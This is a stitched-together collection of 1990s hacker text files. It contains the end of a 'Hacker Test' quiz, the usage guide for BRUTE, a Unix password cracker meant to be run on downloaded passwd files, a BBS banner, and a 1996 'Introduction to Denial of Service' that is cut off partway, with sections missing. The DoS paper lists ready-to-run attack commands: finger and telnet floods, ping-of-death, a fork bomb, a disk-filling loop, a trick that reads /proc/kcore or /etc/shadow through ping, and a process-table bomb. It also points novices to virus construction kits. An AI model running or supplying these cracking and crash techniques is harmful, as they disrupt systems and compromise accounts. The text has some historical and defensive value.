0506 ... the Stupid People's Court?

0507 ... Bandy-grams?

* Phreaking

0508 Have you ever built a black box?

0509 Can you name all of the 'colors' of boxes?

0510 ... and their associated functions?

0511 Does your touch tone phone have 16 DTMF buttons on it?

0512 Did the breakup of MaBell create more opportunities for you?

If you have any comments of suggestions regarding the HACKER TEST,

Please send then to: hayes@psunuce.bitnet

or jwh100@psuvm.bitnet / jwh100@psuvmxa.bitnet

or jwh100@psuvm.psu.edu / jwh100@psuvmxa.psu.edu

or ...!psuvax1!psuvm.bitnet!jwh100

A brute force

BRUTE: A brute force approach to hacking Unix passwords. Version 1.1
------------------------------------------------------------------------------

Here's how to use it in a nutshell...

Download the passwd file from your local unix site, or have someone download
it for you. It should be in the unix format (that is, line feeds but no
carriage returns) so don't run it through any conversion programs--Brute uses
it "as-is".

To check a single password against your list do this:

BRUTE passwd Password

(that would check the passwd file for the password "Password"). Brute is
case sensitive (just as unix is), so "Password" is different than "password".

To convince yourself that brute actually works you'll probably want to run it
with your password and see that it pulls up your account. It will.

---

Brute can be used with a list of passwords. In this case, edit up a list or
use a pre-made one (one password per line) and call brute like this:

BRUTE passwd @passlist.txt

(where passlist.txt is the name of your list-of-passwords. The @ sign tells
brute that you're using list file). Note that you don't have to use the name
"passlist.txt" for your word list, and you don't have to use the name
"passwd" for the password file. This allows you to keep separate word lists
for different types of unix sites, and separate password files.

Right now that's about it. There are a few enhancements I'm planning in the
future, but this ought to do the trick for you. Any passwords found are
written to the file "PWD_HITS.DAT".

Brute ignores unpassworded and invalidly-passworded accounts automatically,
so you should probably check the passwd file for these babys yourself.

---

Brute is about 25% faster than it's nearest competitor.

Have fun.

Prometheus

---

Version 1.1: Fixed the icky short int bug which causes the "Password"
counter to go negative after 32k attempts (changed to long
int--now it will go negative should you reach 2 billion
attempts in a single setting, which isn't extrememly likely.

Added the "*" password to check for the username as a password
(forward and reversed). Either put * on a line by itself in
your word list file, or call brute like this: brute passwd *
---

Version 2.0: I'm using the fastcrypt routine as ported to DOS by Gandalf and
distributed in OBJ form by sir hackalot. I haven't measured
the speed increase, but it's not as much as I had hoped. Maybe
twice as fast. Anyhow, such is life.

ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
ÜÝÄ’œ›Š úúúúúúúúúúúúúúú THE HOLLOW'S ALLIANCE úúúúúúúúúúúúúúú AliceÄÞÜ ú
ÜÝÄ (415)849-2688 Ÿ‰‰ë æ”r hîŽë (415)849-2688 ÄÞÜ ú
ÜÝ ÄÄ Ä Ä Ä Ä Ä Ä T-file Distribution Cent-a-RoR Ä Ä Ä Ä Ä Ä ÄÄ ÞÜ ú
ÜÝDr. Murdock ú Powerful Paul ú RatSnatcher ú Sir Death ú Pressed RatÞÜ ú
ÜÝ ÄÄ Ä Ä Ä R o R - A l u c a r d Ä Ä Ä ÄÄ ÞÜ ú
ÜÝÄ The Corporate Headquarters of Shawn-Da-Lay Boy Productions, Inc.ÄÞÜ ú
ÜÝÄúúúú Ø úúúúSmooth is the Descent and Easy is the Wayúúúúú Ø úúúúúÄÞÜ ú
ÜÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛÜ ú
úúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúúú

Introduction to DENIAL OF SERVICE

===================================
=INTRODUCTION TO DENIAL OF SERVICE=
===================================

Hans Husman
t95hhu@student.tdb.uu.se
Last updated: Mon Oct 28 14:56:31 MET 1996

.0. FOREWORD

.A. INTRODUCTION
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
.A.2.1. INTRODUCTION
.A.2.2. SUB-CULTURAL STATUS
.A.2.3. TO GAIN ACCESS
.A.2.4. REVENGE
.A.2.5. POLITICAL REASONS
.A.2.6. ECONOMICAL REASONS
.A.2.7. NASTINESS
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?

.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
.B.2. BANDWIDTH
.B.3. KERNEL TABLES
.B.4. RAM
.B.5. DISKS
.B.6. CACHES
.B.7. INETD

.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
.C.2. UDP AND SUNOS 4.1.3.
.C.3. FREEZING UP X-WINDOWS
.C.4. MALICIOUS USE OF UDP SERVICES
.C.5. ATTACKING WITH LYNX CLIENTS
.C.6. MALICIOUS USE OF telnet
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
.C.8. HOW TO DISABLE ACCOUNTS
.C.9. LINUX AND TCP TIME, DAYTIME
.C.10. HOW TO DISABLE SERVICES
.C.11. PARAGON OS BETA R1.4
.C.12. NOVELLS NETWARE FTP
.C.13. ICMP REDIRECT ATTACKS
.C.14. BROADCAST STORMS
.C.15. EMAIL BOMBING AND SPAMMING
.C.16. TIME AND KERBEROS
.C.17. THE DOT DOT BUG
.C.18. SUNOS KERNEL PANIC
.C.19. HOSTILE APPLETS
.C.20. VIRUS
.C.21. ANONYMOUS FTP ABUSE
.C.22. SYN FLOODING
.C.23. PING FLOODING
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
.C.26. FLEXlm
.C.27. BOOTING WITH TRIVIAL FTP

.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
.D.2. CRASHING THE X-SERVER
.D.3. FILLING UP THE HARD DISK
.D.4. MALICIOUS USE OF eval
.D.5. MALICIOUS USE OF fork()
.D.6. CREATING FILES THAT IS HARD TO REMOVE
.D.7. DIRECTORY NAME LOOKUPCACHE
.D.8. CSH ATTACK
.D.9. CREATING FILES IN /tmp
.D.10. USING RESOLV_HOST_CONF
.D.11. SUN 4.X AND BACKGROUND JOBS
.D.12. CRASHING DG/UX WITH ULIMIT
.D.13. NETTUNE AND HP-UX
.D.14. SOLARIS 2.X AND NFS
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X

.E. DUMPING CORE
.E.1. SHORT COMMENT
.E.2. MALICIOUS USE OF NETSCAPE
.E.3. CORE DUMPED UNDER WUFTPD
.E.4. ld UNDER SOLARIS/X86

.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
.F.1.2. PORT SCANNING
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.5. EXTRA SECURITY SYSTEMS
.F.1.6. MONITORING SECURITY
.F.1.7. KEEPING UP TO DATE
.F.1.8. READ SOMETHING BETTER
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
.F.2.2. COMMANDS AND SERVICES
.F.2.3. PROGRAMS
.F.2.4. ACCOUNTING

.G. SUGGESTED READING
.G.1. INFORMATION FOR DEEPER KNOWLEDGE
.G.2. KEEPING UP TO DATE INFORMATION
.G.3. BASIC INFORMATION

.H. COPYRIGHT

.I. DISCLAIMER

.0. FOREWORD
------------

In this paper I have tried to answer the following questions:

- What is a denial of service attack?
- Why would someone crash a system?
- How can someone crash a system.
- How do I protect a system against denial of service attacks?

I also have a section called SUGGESTED READING were you can find
information about good free information that can give you a deeper
understanding about something.

Note that I have a very limited experience with Macintosh, OS/2 and
Windows and most of the material are therefore for Unix use.

You can always find the latest version at the following address:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address:
t95hhu@student.tdb.uu.se

.A. INTRODUCTION
~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------

Denial of service is about without permission knocking off
services, for example through crashing the whole system. This
kind of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.

.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
---------------------------------------

.A.2.1. INTRODUCTION
--------------------

Why would someone crash a system? I can think of several reasons
that I have presentated more precisely in a section for each reason,
but for short:

.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.

I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS
---------------------------

After all information about syn flooding a bunch of such attacks
were launched around Sweden. The very most of these attacks were
not a part of a IP-spoof attack, it was "only" a denial of service
attack. Why?

I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their carrer with denial of service attacks.

.A.2.3. TO GAIN ACCESS
----------------------

Sometimes could a denial of service attack be a part of an attack to
gain access at a system. At the moment I can think of these reasons
and specific holes:

.1. Some older X-lock versions could be crashed with a
method from the denial of service family leaving the system
open. Physical access was needed to use the work space after.

.2. Syn flooding could be a part of a IP-spoof attack method.

.3. Some program systems could have holes under the startup,
that could be used to gain root, for example SSH (secure shell).

.4. Under an attack it could be usable to crash other machines
in the network or to deny certain persons the ability to access
the system.

.5. Also could a system being booted sometimes be subverted,
especially rarp-boots. If we know which port the machine listen
to (69 could be a good guess) under the boot we can send false
packets to it and almost totally control the boot.

.A.2.4. REVENGE
---------------

A denial of service attack could be a part of a revenge against a user
or an administrator.

.A.2.5. POLITICAL REASONS
-------------------------

Sooner or later will new or old organizations understand the potential
of destroying computer systems and find tools to do it.

For example imaginate the Bank A loaning company B money to build a
factory threating the environment. The organization C therefor crash A:s
computer system, maybe with help from an employee. The attack could cost
A a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS
--------------------------

Imaginate the small company A moving into a business totally dominated by
company B. A and B customers make the orders by computers and depends
heavily on that the order is done in a specific time (A and B could be
stock trading companies). If A and B can't perform the order the customers
lose money and change company.

As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B:s computer systems a number of times. A year later A
is the dominating company.

.A.2.7. NASTINESS
-----------------

I know a person that found a workstation where the user had forgotten to
logout. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the login time and placed a call to
the program from the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------

This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.

A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.

Unix systems are much more complex and have hundreds of built in programs,
services... This always open up many ways to crash the system from
the inside.

In the normal Windows NT and 95 network were is few ways to crash
the system. Although were is methods that always will work.

That gives us that no big different between Microsoft and Unix can
be seen regardning the inside attacks. But there is a couple of
points left:

- Unix have much more tools and programs to discover an
attack and monitoring the users. To watch what another user
is up to under windows is very hard.

- The average Unix administrator probably also have much more
experience than the average Microsoft administrator.

The two last points gives that Unix is more secure against inside
denial of service attacks.

A comparison between Microsoft and Unix regarding outside attacks
are much more difficult. However I would like to say that the average
Microsoft system on the Internet are more secure against outside
attacks, because they normally have much less services.

.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE
----------------

Most systems have several hundred Mbytes of swap space to
service client requests. The swap space is typical used
for forked child processes which have a short life time.
The swap space will therefore almost never in a normal
cause be used heavily. A denial of service could be based
on a method that tries to fill up the swap space.

.B.2. BANDWIDTH
---------------

If the bandwidth is to high the network will be useless. Most
denial of service attack influence the bandwidth in some way.

.B.3. KERNEL TABLES
-------------------

It is trivial to overflow the kernel tables which will cause
serious problems on the system. Systems with write through
caches and small write buffers is especially sensitive.

Kernel memory allocation is also a target that is sensitive.
The kernel have a kernelmap limit, if the system reach this
limit it can not allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPU:s, screens and so
on, it it also used for ordinaries processes. Meaning that any system
can be crashed and with a mean (or in some sense good) algorithm pretty
fast.

For Solaris 2.X it is measured and reported with the sar command
how much kernel memory the system is using, but for SunOS 4.X there
is no such command. Meaning that under SunOS 4.X you don't even can
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. netstat -k can also be used and shows how much
memory the kernel have allocated in the subpaging.

.B.4. RAM
---------

A denial of service attack that allocates a large amount of RAM
can make a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack at
a NFS server is trivial. The normal NFS client will do a
great deal of caching, but a NFS client can be anything
including the program you wrote yourself...

.B.5. DISKS
-----------

A classic attack is to fill up the hard disk, but an attack at
the disks can be so much more. For example can an overloaded disk
be misused in many ways.

.B.6. CACHES
-------------

A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Cache information read from disk in case it is needed
again.

Rnode cache: Holds information about the NFS filesystem.

Buffer cache: Cache inode indirect blocks and cylinders to realed disk
I/O.

.B.7. INETD
-----------

Well once inetd crashed all other services running through inetd no
longer will work.

.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------

Most fingerd installations support redirections to an other host.

Ex:

$finger @system.two.com@system.one.com

finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Lock at this:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, short free memory and a hard disk with
less free space, due to all child processes (compare with .D.5.).

The solution is to install a fingerd which don't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit to much.

.C.2. UDP AND SUNOS 4.1.3.
--------------------------

SunOS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the cause if the ip_options
indicate a wrong size of the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS
---------------------------

If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025. In most cases 6000) could that
be used to freeze up the X-Windows system. This can be made with
multiple telnet connections to the port or with a program which
sends multiple XOpenDisplay() to the port.

The same thing can happen to Motif or Open Windows.

The solution is to deny connections to the X-Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) to
loop, due to trivial IP-spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claim that the packet came from 127.0.0.1 (loopback) and the target
is the echo port at system.we.attack. As far as system.we.attack knows
is 127.0.0.1 system.we.attack and the loop has been establish.

Ex:

from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7

Note that the name system.we.attack looks like a DNS-name, but the
target should always be represented by the IP-number.

Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"

" A great deal of systems don't put loopback on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "

.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------

A World Wide Web server will fork an httpd process as a respond
to a request from a client, typical Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses ps. In most causes it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typical lynx clients. But note that the netstat
command could be used to detect the attack (thanks to Paul D. Robertson).

Some httpd:s (for example http-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those causes get
the server to loop (compare with .C.6.)

.C.6. MALICIOUS USE OF telnet
-----------------------------

Study this little script:

Ex:

while : ; do
telnet system.we.attack &
done

An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well
the point is that some pretty common firewalls and httpd:s thinks
that the attack is a loop and turn them self down, until the
administrator sends kill -HUP.

This is a simple high risk vulnerability that should be checked
and if present fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------

If the attacker makes a telnet connections to the Solaris 2.4 host and
quits using:

Ex:

Control-}
quit

then will inetd keep going "forever". Well a couple of hundred...

The solution is to install the proper patch.

.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------

Some systems disable an account after N number of bad logins, or waits
N seconds. You can use this feature to lock out specific users from
the system.

.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------

Inetd under Linux is known to crash if to many SYN packets sends to
daytime (port 13) and/or time (port 37).

The solution is to install the proper patch.

.C.10. HOW TO DISABLE SERVICES
------------------------------

Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some SunOS systems that have the
default set to 48...

The solutions is to set the number to something reasonable.

.C.11. PARAGON OS BETA R1.4
---------------------------

If someone redirects an ICMP (Internet Control Message Protocol) packet
to a paragon OS beta R1.4 will the machine freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.

The solution is to install the proper patch.

.C.12. NOVELLS NETWARE FTP
--------------------------

Novells Netware FTP server is known to get short of memory if multiple
ftp sessions connects to it.

.C.13. ICMP REDIRECT ATTACKS
----------------------------

Gateways uses ICMP redirect to tell the system to override routing
tables, that is telling the system to take a better way. To be able
to misuse ICMP redirection we must know an existing connection
(well we could make one for ourself, but there is not much use for that).
If we have found a connection we can send a route that
loses it connectivity or we could send false messages to the host
if the connection we have found don't use cryptation.

Ex: (false messages to send)

DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG

The effect of such messages is a reset of the connection.

The solution could be to turn ICMP redirects off, not much proper use
of the service.

.C.14. BROADCAST STORMS
-----------------------

This is a very popular method in networks there all of the hosts are
acting as gateways.

There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that don't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.

Services that can be misused as tools in this kind of attack is for
example ping, finger and sendmail. But most services can be misused
in some way or another.

.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------

In a email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a replay and if the address is false will the mail bounce back. In
that cause have one mail transformed to three mails. The effect on the
bandwidth is obvious.

There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".

.C.16. TIME AND KERBEROS
------------------------

If not the the source and target machine is closely aligned will the
ticket be rejected, that means that if not the protocol that set the
time is protected it will be possible to set a kerberos server of
function.

.C.17. THE DOT DOT BUG
----------------------

Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.

The solution is to install the proper patch.

.C.18. SUNOS KERNEL PANIC
-------------------------

Some SunOS systems (running TIS?) will get a kernel panic if a
getsockopt() is done after that a connection has been reset.

The solution could be to install Sun patch 100804.

.C.19. HOSTILE APPLETS
----------------------

A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:

1) Problems due to bugs.
2) Problems due to features in the language.

In group one we have for example the java bytecode verifier bug, which
makes is possible for an applet to execute any command that the user
can execute. Meaning that all the attack methods described in .D.X.
could be executed through an applet. The java bytecode verifier bug
was discovered in late March 1996 and no patch have yet been available
(correct me if I'am wrong!!!).

Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JDK 1.0.1.

Group two are more interesting and one large problem found is the
fact that java can connect to the ports. Meaning that all the methods
described in .C.X. can be performed by an applet. More information
and examples could be found at address:

http://www.math.gatech.edu/~mladue/HostileArticle.html

If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disable.

.C.20. VIRUS
------------

Computer virus is written for the purpose of spreading and
destroying systems. Virus is still the most common and famous
denial of service attack method.

It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of virus it
is easy. Several automatic toolkits for virus construction could
also be found, for example:

* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).

PS-MPC and VCL is known to be the best and can help the novice programmer
to learn how to write virus.

An automatic tool called MtE could also be found. MtE will transform
virus to a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be catch by any scanner.

.C.21. ANONYMOUS FTP ABUSE
--------------------------

If an anonymous FTP archive have a writable area it could be misused
for a denial of service attack similar with with .D.3. That is we can
fill up the hard disk.

Also can a host get temporarily unusable by massive numbers of
FTP requests.

For more information on how to protect an anonymous FTP site could
CERT:s "Anonymous FTP Abuses" be a good start.

.C.22. SYN FLOODING
-------------------

Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.

As we know the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is the attacker host
will send a flood of syn packet but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection, a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.

The syn flooding attack is very hot and it is easy to find more information
about it, for example:

[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".

[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.

Under Unix we could try something like: ping -s host
to send 64 bytes packets.

If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------

The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.

The host should not accept the message any time but under the reboot.

.C.26. FLEXlm
-------------

Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.

.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this
is executed:

EX:

$ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.

Ex:

$ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
-----------------------------

If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.

Ex:

while : ;
mkdir .xxx
cd .xxx
done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the
C-shell.

Ex:

% eval '\!\!'

.D.5. MALICIOUS USE OF fork()
-----------------------------

If someone executes this C++ program the result will result in a crash
on most systems.

Ex:

#include
#include
#include

main()
{
int x;
while(x=0;x<1000000;x++)
{
system("uptime");
fork();
}
}

You can use any command you want, but uptime is nice
because it shows the workload.

To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.

If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload.

There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.

.D.6. CREATING FILES THAT IS HARD TO REMOVE
-------------------------------------------

Well all files can be removed, but here is some ideas:

Ex.I.

$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$

Ex.II.

$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$

(You see the size do count!)

Other well know methods is files with odd characters or spaces
in the name.

These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./. It should work for
the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.

Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch
more processes.

.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.

Ex:

|I /bin/csh
nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read in the variable and access through ping.

Ex:

$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------

Thanks to Mr David Honig for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------

ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the
passwd file be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:

- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq

The solution could be to set the proper permission on
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.

$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b

The solution could be to set the proper permission on
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.

.E. DUMPING CORE
~~~~~~~~~~~~~~~~

.E.1. SHORT COMMENT
-------------------

The core dumps things don't really belongs in this paper but I have
put them here anyway.

.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------

Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.

Ex:

.F.1.7. MONITORING SECURITY
---------------------------

Also monitor security regular, for example through examining system log
files, history files... Even in a system without any extra security systems
could several tools be found for monitoring, for example:

- uptime
- showmount
- ps
- netstat
- finger

(see the man text for more information).

.F.1.8. KEEPING UP TO DATE
--------------------------

It is very important to keep up to date with security problems. Also
understand that then, for example CERT, warns for something it has often
been dark-side public for sometime, so don't wait. The following resources
that helps you keeping up to date can for example be found on the Internet:

- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.

